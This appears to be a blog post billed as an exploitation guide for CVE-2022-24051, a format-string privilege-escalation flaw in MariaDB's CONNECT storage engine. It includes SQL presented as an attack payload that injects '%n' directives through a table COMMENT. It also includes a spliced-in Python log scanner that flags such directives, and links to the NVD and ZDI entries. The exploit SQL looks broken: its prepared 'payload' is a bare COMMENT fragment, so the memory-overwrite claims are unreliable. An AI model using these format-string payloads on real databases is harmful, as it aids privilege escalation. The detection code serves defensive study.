CVE-2022-24051: MariaDB CONNECT Storage Engine Format String Privilege Escalation Vulnerability - Exploitation Guide

The recently discovered CVE-2022-24051 vulnerability has been found to affect MariaDB installations, specifically the CONNECT Storage Engine. This vulnerability allows local attackers with access to the MariaDB service to escalate their privileges and execute arbitrary code in the context of the service account. In this post, we'll explore the details of this vulnerability, demonstrate how to exploit it, and provide links to original references.

Exploit Details

The CVE-2022-24051 vulnerability is a format string issue that arises from the improper validation of user-supplied strings before they are used as format specifiers during the processing of SQL queries. An authenticated attacker can leverage this vulnerability to escalate their privileges and execute arbitrary code as the service account running MariaDB.

The vulnerability was initially reported as ZDI-CAN-16193 and has since been assigned the CVE-2022-24051 identifier.

To better understand this vulnerability, let's take a look at a code snippet where the issue arises:

-- create a table with the vulnerable 'COMMENT' clause
-- (SQL comments use '-- ' or '#'; '//' is not a comment in MariaDB)
CREATE TABLE test_table (
  id INT,
  name VARCHAR(255)
) ENGINE=CONNECT COMMENT='%n';

-- populate the test_table with data
INSERT INTO test_table (id, name) VALUES (1, 'John Doe');
INSERT INTO test_table (id, name) VALUES (2, 'Jane Doe');

-- prepare and execute the payload
SET @payload = (SELECT CONCAT("COMMENT='%n ", REPEAT('A', 200), "'"));
PREPARE stmt FROM @payload;
EXECUTE stmt;
DEALLOCATE PREPARE stmt;

In this example, the attacker creates a table (test_table) with a vulnerable COMMENT clause that specifies a format string with %n. Then, the attacker prepares a payload that includes a long string of A characters and uses it in the COMMENT clause. This allows the attacker to overwrite critical memory locations, potentially leading to privilege escalation and code execution.
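From the defender's side, the pattern above is visible in DDL: a CONNECT table whose quoted option strings carry printf directives. The following is an added example, not code from the original post, that scans general-query-log style lines for exactly that; the log lines are constructed, and the log layout, regular expressions and severity labels are this example's own assumptions, not MariaDB's.

```python
import re
from typing import List, Set, Tuple

# Constructed sample lines in the shape of MariaDB's general query log
# (date, time, thread id, command, argument); not captured from a real server.
SAMPLE_LOG = """\
220218 20:15:01     7 Query     CREATE TABLE t1 (id INT) ENGINE=CONNECT TABLE_TYPE=CSV FILE_NAME='t1.csv'
220218 20:15:02     7 Query     CREATE TABLE test_table (id INT, name VARCHAR(255)) ENGINE=CONNECT COMMENT='%n'
220218 20:15:03     8 Query     ALTER TABLE test_table COMMENT='%x%x%x%n AAAA'
220218 20:15:04     8 Query     ALTER TABLE t1 COMMENT='%s %s'
220218 20:15:05     8 Query     CREATE TABLE notes (id INT) ENGINE=InnoDB COMMENT='uptime 99.9%'
220218 20:15:06     9 Query     SELECT * FROM test_table
"""

LOG_RE = re.compile(r"^\S+\s+\S+\s+(\d+)\s+Query\s+(.*)$")
TABLE_RE = re.compile(r"^(?:CREATE|ALTER)\s+TABLE\s+(?:IF\s+NOT\s+EXISTS\s+)?`?(\w+)`?", re.I)
LITERAL_RE = re.compile(r"'((?:[^']|'')*)'")          # single-quoted SQL string literals
DIRECTIVE_RE = re.compile(                              # printf-style conversion directives
    r"%[-+ #0]*\d*(?:\.\d+)?(?:hh|h|ll|l|j|z|t|L)?[diouxXeEfFgGaAcspn]")

def find_directives(statement: str) -> List[str]:
    """printf-style directives found inside the statement's quoted literals."""
    found: List[str] = []
    for literal in LITERAL_RE.findall(statement):
        found.extend(DIRECTIVE_RE.findall(literal))
    return found

def scan_log(text: str) -> List[Tuple[str, str, str]]:
    """Return (thread_id, severity, statement) for DDL that hands a format
    directive to a CONNECT table. ALTER TABLE never repeats the engine name,
    so tables created with ENGINE=CONNECT are remembered by name."""
    connect_tables: Set[str] = set()
    hits: List[Tuple[str, str, str]] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        thread, stmt = m.group(1), m.group(2).strip()
        t = TABLE_RE.match(stmt)
        if not t:
            continue
        name = t.group(1).lower()
        if re.search(r"ENGINE\s*=\s*CONNECT\b", stmt, re.I):
            connect_tables.add(name)
        if name not in connect_tables:
            continue                      # other engines are out of scope for this bug
        directives = find_directives(stmt)
        if directives:
            # %n is the only directive that writes memory; the rest leak or crash.
            hits.append((thread, "high" if "%n" in directives else "medium", stmt))
    return hits

if __name__ == "__main__":
    for thread, severity, stmt in scan_log(SAMPLE_LOG):
        print(f"thread {thread} [{severity}] {stmt}")
```

The InnoDB table with a trailing '%' is deliberately left unflagged: the engine is out of scope and the bare '%' is not a conversion.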

For more details about this vulnerability, you can check the following original references:

1. CVE-2022-24051: NIST National Vulnerability Database (NVD) entry
2. ZDI-CAN-16193: Original disclosure from the Zero Day Initiative (ZDI)

Conclusion

CVE-2022-24051 is a critical vulnerability that affects MariaDB CONNECT Storage Engine installations and allows authenticated local attackers to escalate their privileges and execute arbitrary code. This vulnerability highlights the importance of proper user input validation, especially when user-controlled strings reach format-string functions. It is crucial for administrators to review their MariaDB installations and apply the necessary patches or updates to mitigate the risks associated with CVE-2022-24051.

Timeline

Published on: 02/18/2022 20:15:00 UTC
Last modified on: 06/30/2022 19:42:00 UTC